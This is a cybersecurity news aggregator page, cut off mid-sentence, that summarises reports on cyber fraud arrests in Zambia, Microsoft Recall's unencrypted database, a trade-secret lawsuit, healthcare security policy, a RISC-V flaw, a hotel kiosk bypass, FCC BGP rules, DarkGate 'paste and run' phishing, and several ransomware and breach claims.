Oktacron logo
Cyber security aggregate rss news

Cyber security aggregator - feeds history
image for Zambia Cyber Fraud C ...

 Firewall Daily

Twenty-two Chinese nationals have pleaded guilty to cyber-related crimes in Zambia, Africa. They are among the 77 suspects, who were arrested earlier this April, linked to, what the authorities described as a highly organized and advanced internet fraud syndicate. The raid took place at a company run by the Chinese in   show more ...

Lusaka, the capital city of Zambia. This operation was prompted by the rising trend of internet crimes which have resulted in individuals’ loss both locally and worldwide. According to reports, the Chinese nationals are expected to be sentenced on Friday. Zambia Cyber Fraud Case: What Led to the Crackdown In recent years, the Drug Enforcement Commission (DEC) of Zambia has noted a drastic increase in events where Zambians lost funds from their mobile and bank accounts due to money laundering schemes that extend beyond its borders. Victims have been identified in various countries such as Singapore, Peru, United Arab Emirates (UAE), and across Africa. Linked to the Zambia cyber fraud case, several young Zambians were also taken into custody for this operation, the BBC reported. These individuals were allegedly recruited to work as call center agents for purposes of defrauding others via the internet or online scams. According to DEC, these recruits would engage unsuspecting mobile users in discussions on platforms like WhatsApp, Telegram, and some chat rooms through scripted dialogue. The trial took several weeks, but concluded with the 22 Chinese nationals, one of them being a woman, pleading guilty to three counts: computer fraud by false representation; possession of articles for use in fraud, and operating an electronic communications network or service without a license. A Cameroonian national was also charged with having changed people’s social media profile pictures to scam them. The suspects were linked to Golden Top Support Services which is a Chinese-owned company that was at the center of the raid. The alleged offenders, according to reports, are yet to respond on this issue. Li Xianlin who is thought to be the director of Golden Top Support Services Limited has been accused of breaking Zambian law by operating his company without acquiring relevant licenses. On Tuesday, the state prosecutor asked for a more detailed statement than what they have provided about each count. The Zambian nationals involved in that conspiracy were arrested in April and then granted bail with conditions until investigations were completed. Among the items seized were gadgets that enabled callers to conceal their location, alongside numerous SIM cards. These items include 11 SIM boxes, which are tools capable of routing calls through real phone networks. The huge number of SIM cards confiscated – over 13,000 – whether domestic or foreign indicates how far and wide this operation was spread. In addition, two firearms, about seventy-eight rounds of ammunition, and two vehicles linked to the Chinese man connected to the business were also taken. Cybercrime in Africa': A Significant Menace The Zambian cyber fraud case illustrates how widespread internet scams have become and how they now have a global reach. Africa's cybercrime is a significant menace estimated at $3.5 billion lost annually in 2020, and the number has continued to increase, with recent data showing that Africa saw the highest average number of weekly cyberattacks per organization in the second quarter of 2023, marking a 23% increase compared to the same period in 2022. The financial losses from these attacks are significant. According to ECA data, Africa's low level of preparedness for cyber threats resulted in an average cost of 10% of GDP for countries in 2022. Countries such as Nigeria, Kenya, and South Africa have been hit hard with a great proportion of cases involving online fraud, identity theft, and financial fraud. According to a CGTN report, in many African countries, weak telecommunication infrastructure has made it easier for cybercrimes to thrive, leading to a noticeable drop in productivity across several sectors. The report highlighted that over 90 percent of African businesses were functioning without the essential cybersecurity protections they need. Similarly in Zambia, cybercrimes have surged with DEC reporting many cases of people and businesses who fall prey to various schemes. This has been aggravated by increased connectivity and use of mobile and internet services making users more vulnerable to cyber-attacks.

image for Researcher Develops ...

 Cybersecurity News

While Microsoft's forthcoming Recall feature has already sparked security and privacy concerns, the tech giant attempted to downplay those reactions by stating that collected data would remain on the user's device. Despite this reassurance, concerns remain, as researchers - including the developer of a new   show more ...

tool dubbed "TotalRecall" - have observed various inherent vulnerabilities in the local database maintained by Recall, lending credibility to critics of Microsoft's implementation of the AI tool. TotalRecall Tool Demonstrates Recall's Inherent Vulnerabilities Recall is a new Windows AI tool planned for Copilot+ PCs that captures screenshots from user devices every five seconds, then storing the data in a local database. The tool's announcement, however, led many to fear that this process would make sensitive information on devices susceptible to unauthorized access. TotalRecall, a new tool developed by Alex Hagenah and named after the 1990 sci-fi film, highlights the potential compromise of this stored information. Hagenah states that the the local database is unencrypted and stores data in plain text format. The researcher likened Recall to spyware, calling it a "Trojan 2.0." TotalRecall was designed to extract and display all the information stored in the Recall database, pulling out screenshots, text data, and other sensitive information, highlighting the potential for abuse by criminal hackers or domestic abusers who may gain physical access to a device. Hagenah's concerns are echoed by others in the cybersecurity community, who have also compared Recall to spyware or stalkerware. Recall captures screenshots of everything displayed on a user's desktop, including messages from encrypted apps like Signal and WhatsApp, websites visited, and all text shown on the PC. TotalRecall can locate and copy the Recall database, parse its data, and generate summaries of the captured information, with features for date range filtering and term searches. Hagenah stated that by releasing the tool on GitHub, he aims to push Microsoft to fully address these security issues before Recall's launch on June 18. Microsoft Recall Privacy and Security Concerns Cybersecurity researcher Kevin Beaumont has also developed a website for searching Recall databases, though he has withheld its release to give Microsoft time to make changes. Microsoft's privacy documentation for Recall mentions the ability to disable screenshot saving, pause Recall on the system, filter out applications, and delete data. Nonetheless, the company acknowledges that Recall does not moderate the captured content, which could include sensitive information like passwords, financial details and more. The risks extend beyond individual users, as employees under "bring your own device" policies could leave with significant amounts of company data saved on their laptops. The UK's data protection regulator has requested more information from Microsoft regarding Recall and its privacy implications. Amid criticism over recent hacks affecting US government data, Microsoft CEO Satya Nadella has emphasized its need to prioritize security. However, the issues surrounding Recall demonstrate that security concerns were not given sufficient attention, and necessitate inspection of its data collection practices before its official release. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

image for SecurityScorecard Fi ...

 Cybersecurity News

New York-based cyber risk ratings vendor SecurityScorecard has filed a lawsuit against its cyber risk management rival Safe Security for alleged involvement in unfair competition and misappropriating trade secrets. SecurityScorecard has accused its former employee, Mary Polyakova of being a key perpetrator of the   show more ...

embezzlement. According to the lawsuit, Polyakova retrieved SecurityScorecard’s confidential information like list of customers and prospects, before quitting the company last month and later joining Safe Security in Silicon Valley as its sales vice president. The breach of confidential information was apparently valued at $40 million at SecurityScorecard which includes details of 9,300 customers and prospects. In a 30-page complaint filed on Tuesday in the Southern District of New York, SecurityScorecard said, “While brazenly touting a 'revolutionary' approach to cybersecurity risk management, defendant Safe's only true 'revolution' is its unconstrained reliance upon unlawful skullduggery and unfair competition to build its business." Meanwhile, SafeSecurity CEO Saket Modi, refuting the allegations, said that his company’s competitors like SecurityScorecard were laying off many of its employees because of its poor business and this is resorting to legal retribution. SecurityScorecard shares embezzlement details According to SecurityScorecard, Polyakova allegedly misappropriated an exhaustive list of the company's customers and prospects, which included the Master East List and CISO Prospect Lists and later shared the information on her personal email. It claimed that if this customer information was misused by Safe Security, it could damage the business prospects of SecurityScorecard. [caption id="attachment_75297" align="alignnone" width="800"] Source: Linkedin[/caption] The company feared that Safe Security could unlawfully poach its customers, which could harm the business interests of SecurityScorecard. Before joining SafeSecurity, Polyakova had spent four years in SecurityScorecard’s sales organization. "SSC's customer and prospect list is the direct result of years of marketing and sales efforts and cannot be replicated through publicly available sources," the company said. "SSC therefore undertakes considerable efforts to maintain the secrecy of its confidential information, including the Master East List and the CISO Prospect Lists." The company alleged that apart from stealing the data and poaching customers, Safe Security used fake accounts to illegally access SecurityScorecard's customer platform and tried to enhance its own cybersecurity offerings. SecurityScorecard alleged that Safe Security misused this access to quality-check its products and make misleading comparisons on the company's website, "Safe has used a shell company or an entirely fake domain to impermissibly access the SSC [SecurityScorecard] platform to perform competitive intelligence gathering," the company said. "This appears to have included trying: (i) to see the SSC products and services purchased by SSC customers; and (ii) validating SAFE's own offerings to customers." SecurityScorecard Wants End to Unlawful Practices According to SecurityScorecard, Safe Security, through its actions, would be violating the former’s end-user SaaS agreement, including registration of IP addresses under fake domains. Safe Security had allegedly launched a webpage to compare its services with SecurityScorecard, the lawsuit alleged. "On April 9, 2024, Safe's Co-Founder and Chief Executive Officer, Saket Modi, bragged to SSC's President, Sachin Bansal, that Safe was interviewing former SSC employees with no real intention of hiring them for open positions," the company said. “As proof of these illicit fact-finding endeavors, Mr. Modi touted to Mr. Bansal confidential statistics on SSC's hiring and restructuring practices," it added. SecurityScorecard claimed that Safe Security had conducted fake job interviews with its employees to elicit confidential business information. The company sought monetary damages as well as stay order to stop Safe Security and Polyakova from using or disclosing the alleged stolen information. "Even when caught in this web of deceptive wrongdoing, Safe has simply adopted a 'deny, deny, deny' posture, effectively doubling down on their unlawful conduct," SecurityScorecard said, and added, "That’s precisely what necessitates the injunctive relief now sought here, to put an immediate end to these unlawful practices and protect SSC's trade secrets and confidential and proprietary information." SecurityScorecard said it had pumped in over $200 million to develop its customer and prospect base and had measures in place to protect its proprietary information.

image for Sen. Wyden Urges HHS ...

 Cyber Essentials

Senator Ron Wyden (D-Ore.) is pressing the U.S. government to accelerate cybersecurity enhancements within the healthcare sector following the devastating Change Healthcare ransomware attack that exposed the protected health information of nearly a third of Americans. In a letter to Xavier Becerra, secretary of the U.   show more ...

S. Department of Health and Human Services, Wyden urged HHS to implement immediate, enforceable steps to improve “lax cybersecurity practices” of large healthcare organizations. “It is clear that HHS’ current approach to healthcare cybersecurity — self-regulation and voluntary best practices — is woefully inadequate and has left the health care system vulnerable to criminals and foreign government hackers.” - Wyden. He stated that the sub-par cybersecurity standards have allowed hackers to steal patient information and disrupt healthcare services, which has caused “actual harm to patient health.” MFA Could Have Stopped Change Healthcare Attack The call from Wyden comes on the back of the ransomware attack on Change Healthcare — a subsidiary of UnitedHealth Group — which, according to its Chief Executive Officer Andrew Witty, could have been prevented with the basic cybersecurity measure of Multi-Factor Authentication (MFA). The lack of MFA on a Citrix remote access portal account that Change Healthcare used proved to be a key vulnerability that allowed attackers to gain initial access using compromised credentials, Witty told the Senate Committee on Finance in a May 1 hearing. “HHS’ failure to regulate the cybersecurity practices of major health care providers like UHG resulted in what the American Hospital Association has described as the worst cyberattack against the healthcare sector in U.S. history.” - Wyden The use of MFA is a fundamental cybersecurity practice that HHS should mandate for all healthcare organizations, Wyden argued. He called for the implementation of broader minimum and mandatory technical cybersecurity standards, particularly for critical infrastructure entities that are designated as "systemically important entities" (SIE) by the U.S. Cybersecurity and Infrastructure Security Agency. “These technical standards should address how organizations protect electronic information and ensure the healthcare system’s resiliency by maintaining critical functions, including access to medical records and the provision of medical care,” Wyden noted. He suggested that HHS enforce these standards by requiring Medicare program participants to comply. Wyden’s Proposed Cybersecurity Measures for HHS Wyden said HHS should mandate a range of cybersecurity measures as a result of the attack. “HHS must follow the lead of other federal regulators in mandating cybersecurity best practices necessary to protect the healthcare sector from further, devastating, easily-preventable cyberattacks,” Wyden argued. The Democratic senator proposed several measures to enhance cybersecurity in the healthcare sector, including: Mandatory Minimum Standards: Establish mandatory cybersecurity standards, including MFA, for critical healthcare infrastructure. Rapid Recovery Capabilities: Ensure that organizations can rebuild their IT infrastructure within 48 to 72 hours following an attack. Regular Audits: Conduct regular audits of healthcare organizations to assess and improve their cybersecurity practices. Technical Assistance: Provide technical security support to healthcare providers. Wyden criticized HHS for its current insufficient regulatory oversight, which he believes contributes to the ongoing cyberattacks harming patients and national security. “The current epidemic of successful cyberattacks against the health care sector is a direct result of HHS’s failure to appropriately regulate and oversee this industry, harming patients, providers, and our national security,” Wyden said. He urged HHS to use all of its authorities to protect U.S. healthcare providers and patients from mounting cybersecurity risks. The State of Ransomware in Healthcare The healthcare sector was the most common ransomware target among all critical infrastructure sectors, according to FBI’s Internet Crime Report 2023. The number of attacks and individuals impacted have grown exponentially over the last three years. [caption id="attachment_75474" align="aligncenter" width="1024"] Ransomware attacks on healthcare in last three years. (Source: Emsisoft)[/caption] “In 2023, 46 hospital systems with a total of 141 hospitals were impacted by ransomware, and at least 32 of the 46 had information, including protected health information, stolen.” - Emsisoft A study from McGlave, Neprash, and Nikpay from the University of Minnesota School of Public Health found that in a five-year period starting in 2016, ransomware attacks likely killed between 42 and 67 Medicare patients. Their study further observed a decrease in hospital volume and services by 17-25% during the week following a ransomware attack that not only hit revenue but also increased in-hospital mortality among patients who were already admitted at the time of attack. HHS Cybersecurity Response HHS announced in December plans to update its cybersecurity regulations for the healthcare sector for the first time in 21 years. These updates would include voluntary cybersecurity performance goals and efforts to improve accountability and coordination. The Healthcare and Public Health Sector Coordinating Council also unveiled a five-year Health Industry Cybersecurity Strategic Plan in April, which recommends 10 cybersecurity goals to be implemented by 2029. Wyden acknowledged and credited the latest reform initiatives from HHS and the HSCC, but remains concerned about the lengthy implementation timeline, which he said requires urgency when it comes to the healthcare sector. The latest letter follows Wyden’s request last week to the SEC and FTC to investigate for any negligence in cybersecurity practices of UnitedHealth Group. HHS is currently investigating the potential UHG breach that resulted in the exposure of protected health information of hundreds of thousands of Americans.

image for Openness of RISC-V B ...

 Firewall Daily

A Chinese research team identified a severe security flaw in the design of RISC-V processors, posing a threat to China's expanding domestic semiconductor/Chip sector. This flaw in the design of RISC-V processors enables cyber attackers to bypass modern processors' security measures without administrative   show more ...

rights. This leads to the possible theft of sensitive information and breaches of personal privacy. RISC-V is an open-source standard used in advanced chips and semiconductors. Unlike mainstream CPU architectures like Intel's and AMD's X86, RISC-V offers free access and can be modified without restriction. The vulnerability was discovered in RISC-V's SonicBOOM open-source code and confirmed by Professor Hu Wei's team at Northwestern Polytechnical University (NPU), a major defense research institute in Shaanxi. On April 24, the Chinese research team, which specializes in hardware design security, vulnerability detection, and cryptographic application safety, reported the issue to China's National Computer Network Emergency Response Technical Team/Coordination Centre (CNCERT). Later, in an official statement, additional details were revealed by NPU on May 24. This openness has made it a critical component of China's strategy to circumvent US-imposed chip bans and achieve semiconductor independence. US-imposed chip bans: What It Is? Since 2022, US officials have set broad restrictions on which computing processors can be supplied to China, reducing shipments of Nvidia (NVDA.O), Advanced Micro Devices (AMD.O), and Intel (INTC.O), among others. These restrictions mirrored previous limits on semiconductor shipment to Huawei Technologies (HWT.UL). However, U.S. officials have granted licenses to at least two US companies, Intel and Qualcomm (QCOM.O), to continue shipping chips to Huawei, which is using an Intel chip to power a new laptop model. Why is This Vulnerability a Trouble For China? The vulnerability's discovery is particularly troubling for China, which has been relying heavily on RISC-V to develop its CPUs. By the end of 2022, over 50 different versions of locally produced RISC-V chips were mass-produced in China, primarily for embedded applications such as industrial controls, power management, wireless connectivity, storage control, and the Internet of Things. Recent developments have seen RISC-V expanding into more demanding applications, including industrial control, autonomous driving, artificial intelligence, telecommunications, and data centers. RISC-V processors have gained popularity due to their simplicity, modularity, scalability, and the rapid evolution of the architecture since its inception. Discovery of RISC-V RISC-V was developed in 2010 by Professor David Patterson at the University of California, Berkeley, who also designed RISC-I in 1980. Despite its advantages, the newly discovered flaw in RISC-V could undermine its reliability and security, potentially impacting its adoption and use in critical applications. This discovery is part of China’s national key research and development program in processor hardware security, initiated in 2021. The program, carried out by CNCERT, Tsinghua University, NPU, and the Institute of Microelectronics of the Chinese Academy of Sciences, focuses on the research and detection of hardware vulnerabilities. The CNCERT report emphasized that processor-related vulnerability mining is highly challenging, with the number of RISC-V processor vulnerabilities in global libraries being significantly lower than software and firmware vulnerabilities. NPU Role NPU's participation in discovering this weakness demonstrates its status as a pioneer in China's information security education and research, which aligns with the country's strategic needs. NPU developed its "information confrontation" undergraduate program in 2000, which was later renamed "information security" in 2009. In 2011, it established the National Institute of Confidentiality, which added "secrecy" to the curriculum. In 2018, the university expanded its cybersecurity focus by founding the School of Cybersecurity. This vulnerability influences China, affecting global technology corporations and the semiconductor industry. As China pursues semiconductor independence, addressing and mitigating such vulnerabilities will be critical to guarantee the security and dependability of its domestic chip industry.

image for Malaysia’s Railway ...

 Firewall Daily

A hack on Malaysia's Railway Assets Corporation (RAC) has been reported by a dark web actor. The key entity under Malaysia's Ministry of Transport was the target of the RAC data hack. The threat actor "billy100" carried out this breach and posted its allegations on the BreachForums platform.  The RAC   show more ...

data breach, which was made public on a dark web forum, refers to personnel records that have been allegedly leaked and connected to the Railway Assets Corporation (RAC). There are 481 lines of documents in the compromised database, according to billy100. As evidence, the threat actor provided samples from the CSV files "users_id" and "detail," which included hashed passwords, email addresses, and usernames. RAC Data Breach Allegedly Exposes Sensitive Information [caption id="attachment_75309" align="alignnone" width="1445"] Source: Dark Web[/caption] Established under the Railways Act of 1991, the Railway Assets Corporation (RAC) is a federal statutory entity tasked with supporting Malaysia's railway infrastructure. Since its founding in 1992, RAC has played a significant role in bringing the nation's railway industry up to par with other leading nations. Since the corporation is in charge of managing and growing railway assets, it is very important. Sensitive employee data is purportedly hidden in the RAC data breach exposed database. Information about several aspects of personnel records is one of the disclosed details. The two main files that make up the stolen data are users_id.csv, which contains vital user information like IDs, names, emails, passwords, and more, and detail.csv, which offers additional in-depth employee information such as personal identifiers, department information, salary, and dates of birth. Investigation and Cyberattacks on the Railway Sector Inquiries on the RAC data loss and potential ransomware gang involvement have been made to the organization by The Cyber Express. However, as of the time of this writing, no formal response or statement had been made, so the allegations regarding the RAC data leak remain unsubstantiated.  Railroads, being essential infrastructure in the digital age, are increasingly vulnerable to cyber threats that endanger both their daily operations and public safety. Attacks on international railway networks in recent times have brought attention to the need for stronger cybersecurity protections. Vulnerabilities brought on by outdated systems, unsecured networking, and IoT devices raise the risks.  Rail operators need to prioritize asset visibility, implement strong authentication, encrypt communication networks, and keep a stockpile of up-to-date patches and upgrades to strengthen security. Ensuring that staff members receive comprehensive cybersecurity training is also essential. If transportation is to continue being reliable and secure in the future, cybersecurity must be fully integrated into railway operations. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

image for FBI Recovers 7,000 L ...

 Firewall Daily

The FBI has retrieved almost 7,000 decryption keys related to the LockBit operation, which affected thousands of businesses. After the sequence of events that resulted in the arrest of the ransomware group, the FBI is now asking LockBit victims to come forward so they can retrieve their encrypted data without worrying   show more ...

about facing financial or legal repercussions. At the Boston Conference on Cyber Security in 2024, Assistant Director of the FBI's Cyber Division Bryan Vorndran spoke about the LockBit operation and the strategies taken by national security agencies to oppose it.  Vorndran continued by outlining the FBI's complex plan for thwarting LockBit ransomware attacks and emphasized the importance of taking preventative measures against this ransomware gang. "Disrupting LockBit and its affiliates became a global effort, involving FBI work with agencies from 10 other countries, particularly the British National Crime Agency, over more than three years," states Vorndran, indicating the FBI's steadfast dedication to enforcing the law online. FBI Urges LockBit Victims to Reclaim Their Encrypted Data The recent action taken by the FBI against the well-known ransomware-as-a-service company LockBit was a critical turning point in the disruption of criminal networks. Vorndran provided insight into the workings of LockBit, blaming its growth on the business ventures of its creator, Dimitri Khoroshev.  “Additionally, from our ongoing disruption of LockBit, we now have over 7,000 decryption keys and can help victims reclaim their data and get back online. We are reaching out to known LockBit victims and encouraging anyone who suspects they were a victim to visit our Internet Crime Complaint Center at ic3.gov”, denoted Vorndran.  Citing previous legal actions against Khoroshev and his co-conspirators for fraud, extortion, and similar offenses, Vorndran reaffirmed the FBI's commitment to bringing perpetrators accountable in an unflinching stance against cyber enemies. He reaffirmed the FBI's commitment to seeking justice and offering assistance to victims by way of programs like the recovery of LockBit decryption keys. Vorndran underlined the significance of thorough cybersecurity procedures and cooperative partnerships in protecting against malevolent activities given the ongoing evolution of cyber threats. He urged all parties involved to band together in the battle against cybercrime, stressing that it is our shared duty to strengthen digital barriers and provide a safe online environment for everybody. Vorndran reaffirmed the FBI's steadfast dedication to thwarting cyber threats and promoting cross-sector cooperation. He called on people to support the idea of group resilience, reiterating the idea that working together is essential to overcoming the ever-changing threats posed by cybercriminals. Ransomware-as-a-service Models on the Rise Recognizing the critical role that partnerships play, Vorndran emphasized the importance of public-private partnerships working together both nationally and internationally to effectively tackle cyber threats. He underlined the value of victim engagement, pointing out that the FBI's operations strategy relies heavily on prompt threat response and all-encompassing victim care. Vorndran's thoughts on cybercrime included a discussion on the emergence of ransomware-as-a-service models. According to these models, affiliates receive sophisticated malware in exchange for payment from criminal syndicates that resemble elements of conventional organized crime. He alerted businesses to the growing threat posed by ransomware attacks, which often combine two or three different extortion techniques, leaving victims vulnerable to both data theft and financial extortion. Vorndran emphasized the need to take preventative action, advising companies to strengthen their cybersecurity defenses and allocate resources in a way that allows for reasonable downtime. Citing cybercriminals' careful assessment of possible victims based on susceptibility, brand reputation, and economic impact, he underlined the significance of target identification.

image for Researchers Accident ...

 Cybersecurity News

Researchers observed a Kiosk mode bypass vulnerability in a remote hotel's check-in terminal during their stay there while traveling to attend a threat modeling workshop. The hotel's terminal operates through the use of the Ariane Allegro Scenario Player. Ariane is an international provider of self-check   show more ...

systems for the hospitality industry, with deployment to more than 3,000 sites across 25 different countries. The researchers discovered the flaw in the check-in system's guest search feature, leading to a crash that allowed for unauthorized access to the underlying system. Kiosk Mode Bypass Grants Access To Hotel's Windows Desktop The hotel, which had no check-in staff, relied solely on the self-service check-in terminal running the Ariane Allegro Scenario Player in kiosk mode. Visiting researchers from Pentagrid discovered that the check-in terminal crashed when a single quote character was inserted into its guest search feature. Upon trying to interact with the terminal screen after the crash, the Windows operating system asks the user if it should wait longer or stop the running task. Selecting the second option halts the kiosk mode application entirely, unexpectedly allowing the team to access the underlying Windows Desktop. The researchers attributed the flaw as an accidental discovery by Martin "O'YOLO" Schobert. The researchers state that this bypass poses significant risks as attackers with access to the Windows desktop could potentially target a hotel's entire network, access stored data (including PII, reservations, and invoices), or create room keys for other hotel rooms by exploiting its RFID room-provisioning functionality. The kiosk mode bypass vulnerability has been rated with a CVSS score of 6.8 (medium). The researchers specified the following preconditions as necessary for successful exploitation of the vulnerability: Physical access to the check-in terminal along with time, depending upon the attack's preparation. The check-in terminal must be in a self-service state, as hotels might enable this option only during specific times or during staff shortage. According to Ariane Systems, the issue stemmed from the use of outdated versions of its check-in software at the new hotel. Disclosure Process and Vendor Response The vulnerability's discovery led the team to investigate further, finding that a hotel chain from Liechtenstein and Switzerland use the check-in terminal for smaller hotel locations. The vulnerability could potentially affect several hotels that rely on Ariane's Allegro Scenario Player check-in system. The researchers first discovered the vulnerability on March 5, 2024, and immediately attempted to disclose it to the vendor through multiple channels, such as LinkedIn, contact numbers and official email addresses. The researchers also attempted to reach out to the company's technical leader and chief product officer, finding a delayed response on March 18 in which Ariane Systems claimed that the reported systems were legacy software models, and that no personally identifiable information (PII) or exploitable data could be retrieved from the kiosk machine. However, the researchers dispute the vendor's claim, stating that the kiosk was designed to produce and keep accessible invoice files. In a later call with Ariane Systems on April 11, further vulnerability details were shared, with the researchers awaiting a response. They state that as of June 5, 2024, there have been no updates from the vendor. They cite the initial delays and lack of additional updates as reasons for publicly disclosing the vulnerability after a waiting period of 90 days. To mitigate potential risks stemming from the vulnerability, the researchers recommended that hotels using the Ariane Allegro Scenario Player check to make sure they have the most recent version of the software installed, as the issue was reportedly fixed by the vendor. Additionally, they advised hotels to isolate check-in terminals to prevent potential bypasses that could allow attackers to compromise hotel networks or underlying Windows systems. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

image for FCC Adopts BGP, Scho ...

 Cybersecurity News

The Federal Communications Commission (FCC) today took steps to make internet use safer in the U.S., approving a $200 million program to improve cybersecurity in schools and proposing to require broadband providers to report on their Border Gateway Protocol (BGP) risk mitigation processes. The three-year Schools and   show more ...

Libraries Cybersecurity Pilot Program will study which cybersecurity services and equipment would best help K-12 schools and libraries address growing cyber threats and attacks against their broadband networks. The pilot program will help the Commission “better understand whether and how universal service funds could be used to support the cybersecurity needs of schools and libraries and to share lessons learned with our federal partners to jointly combat this growing problem.” The program will be kept separate from the FCC’s E-Rate program “to ensure gains in enhanced cybersecurity do not undermine E-Rate’s success in connecting schools and libraries and promoting digital equity.” [caption id="attachment_75509" align="alignright" width="200"] FCC Chair Jessica Rosenworcel[/caption] This pilot program is part of FCC Chair Jessica Rosenworcel’s Learn Without Limits initiative to improve connectivity in schools and libraries “so everyone, everywhere has access to high-speed internet services.” That initiative supports Wi-Fi on school buses, E-Rate support for libraries in Tribal communities, and funding from the E-Rate program for off-premises use of Wi-Fi hotspots and wireless internet access services. BGP Security Targeted by FCC The BGP security initiative stops short of mandating security standards for broadband service providers, and instead would simply require them to report on the effectiveness of those efforts. The measure will be open for public comment before it can be finalized. Broadband providers would be required to “create confidential reports on the steps they have taken, and plan to undertake, to mitigate vulnerabilities in the Border Gateway Protocol (BGP), the technical protocol used to route information across the internet. The nation’s largest broadband providers would also be required to file specific public data on a quarterly basis demonstrating their BGP risk mitigation progress.” The decades-old protocol, widely used for communication between networks, “does not include intrinsic security features to ensure trust in the information that is relied upon to exchange traffic among independently managed networks on the internet,” the FCC said in a press release. “BGP national security experts have raised concerns that a bad network actor may deliberately falsify BGP reachability information to redirect traffic. These ‘BGP hijacks’ can expose Americans’ personal information; enable theft, extortion, and state-level espionage; and disrupt services upon which the public or critical infrastructure sectors rely.” The Notice of Proposed Rulemaking adopted today would require that broadband internet access service providers “prepare and update confidential BGP security risk management plans at least annually. These plans would detail their progress and plans for implementing BGP security measures that utilize the Resource Public Key Infrastructure (RPKI), a critical component of BGP security.” The nine largest providers would also have to file publicly available quarterly data assessing progress in the implementation of RPKI-based security measures. These large providers won’t have to file subsequent detailed plans with the FCC if they meet a certain security threshold. Smaller broadband providers would not be required to file their plans with the Commission, but would make them available to the FCC upon request. BGP Hijacked by China Telecom 6 Times In a statement, Rosenworcel noted that BGP is also known as the “three-napkin protocol.” [caption id="attachment_75508" align="alignleft" width="300"] Vint Cerf, "the father of the internet"[/caption] “Back in 1989, the internet, then a novelty for computer scientists like Vint Cerf, was expanding—fast,” she said. “But the internet’s basic protocols at the time could not handle this growth. So on their lunch break from an Internet Engineering Task Force meeting in Austin, Texas, a pair of engineers sketched out the ideas for BGP on three ketchup-stained paper napkins. What was meant to be a short-term solution developed on the sidelines of an internet engineering conference is still with us today.” Rosenworcel thanked the Cybersecurity and Infrastructure Security Agency “for working with my office and jointly holding a BGP public forum to discuss this problem.” She also thanked the Department of Defense and Department of Justice “for publicly disclosing in our record that China Telecom used BGP vulnerabilities to misroute United States internet traffic on at least six occasions. “These ‘BGP hijacks’ can expose personal information, enable theft, extortion, and state-level espionage,” she said. “They can also disrupt sensitive transactions that require security, like those in the financial sector.”

image for Researchers Warn Abo ...

 Cybersecurity News

Security researchers have uncovered a new phishing campaign that attempts to trick recipients into pasting (CTRL+V) and executing malicious commands on their system. It leverages a sophisticated attack chain along with what the researchers have dubbed the "paste and run" technique. 'Paste and Run'   show more ...

Phishing Technique The attackers behind the campaign send emails to potential victims purporting to be from legitimate businesses or organizations. Researchers from AhnLab stated that these emails often involve topics such as fee processing or operational instructions to entice recipients into opening attached files. The emails contain a file attachment with disguised intent, as in the examples below. [caption id="attachment_75497" align="alignnone" width="1200"] Source: asec.ahnlab.com[/caption] Once the victim clicks on the HTML attachment, a fake message displays in the browser while disguising itself as a Microsoft Word document. This message directs the user to click on a "How to fix" button that purports to help them load the document offline. After clicking the button, a set of instructions prompt the user to type out a set of keyboard commands—first type [Win+R], then [Ctrl+V], and press [Enter]. [caption id="attachment_75494" align="alignnone" width="1200"] Source: asec.ahnlab.com[/caption] The button may alternatively load a different set of instructions directing the user to manually access the Windows PowerShell terminal and hit right-click within the terminal window. By following the instructions, the victim inadvertently pastes a malicious script to the terminal, which then executes in their system. Phishing Scheme Installs DarkGate Malware The PowerShell script downloaded and executed by the scheme is a component of the DarkGate malware family. Once the script is run, it downloads and executes an HTA (HTML Application) file from a remote command-and-control server. The HTA file then executes additional instructions to launch an AutoIt3.exe file while passing a malicious AutoIt script (script.a3x) as an argument. The script appears to load the DarkGate malware to infect the system while also clearing the user's clipboard to conceal the execution of malicious commands. "The overall operation flow from the reception of the email to the infection is quite complex, making it difficult for users to detect and prevent," the researchers noted. [caption id="attachment_75496" align="alignnone" width="1200"] Source: asec.ahnlab.com[/caption] Protecting Against the Phishing Campaign The researchers advised email recipients to remain cautious when handling unsolicited emails, even if they appear to be from legitimate sources, to avoid falling victim to the phishing campaign. Recipients should refrain from opening attachment files or clicking on links until they can verify the email sender and its content. "Users must take extra caution when handling files from unknown sources, especially the URLs and attachments of emails," the researchers emphasized. Additionally, recipients should also be wary of any messages that prompt them to execute commands, as it is a common tactic used by attackers to compromise systems. Upon receiving such requests, it is recommended to either ignore the email or report it to your organization's IT security team. The researchers also shared various indicators of compromise (IOCs) such as Base64-encoded PowerShell commands, HTA files, and Autoit scripts, download URLs, file signatures and behavioral indicators associated with the campaign. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

image for Akira Ransomware Cla ...

 Firewall Daily

The Akira ransomware group allegedly targeted E-T-A Elektrotechnische Apparate GmbH, an organization located in Germany. The ransomware group claims to have stolen 24 gigabytes of sensitive material, including customer information, non-disclosure agreements (NDAs), financial records, and employee personal information.   show more ...

To substantiate these claims, the threat actor has attached a screenshot with all this information. E-T-A Elektrotechnische Apparate GmbH operates six production facilities and has a presence in 60 countries worldwide. The company’s product range includes a variety of electrical protection solutions essential to numerous industries. The company is renowned for manufacturing circuit breakers, electronic circuit protectors, and various other electronic components. Despite the ransomware group's claims, the company's official website appeared to be fully functional, and there were no signs of foul play. Further to verify Akira's cyberattack on E-T-A claims, The Cyber Express Team reached out to E-T-A Elektrotechnische Apparate GmbH for an official statement. As of the time of writing, no response has been received from the company. This leaves the ransomware claims unverified, with no confirmation or denial from E-T-A's officials. Akira Ransomware: Previous Track Record The Akira ransomware gang has arisen as a danger to small and medium-sized organizations (SMBs), mostly in Europe, North America, and Australia. The group uses advanced tactics to infiltrate systems, frequently acquiring illegal access to a company's virtual private networks (VPNs). Sophos X-Ops research shows that Akira often uses compromised login credentials or exploits weaknesses in VPN technologies such as Cisco ASA SSL VPN or Cisco AnyConnect. Recently, in May 2024, Akira targeted Western Dovetail, a well-known woodworking shop. In April 2024, Akira was identified as the gang responsible for a series of cyberattacks against businesses and key infrastructure in North America, Europe, and Australia. According to the US Federal Bureau of Investigation (FBI), Akira has hacked over 250 firms 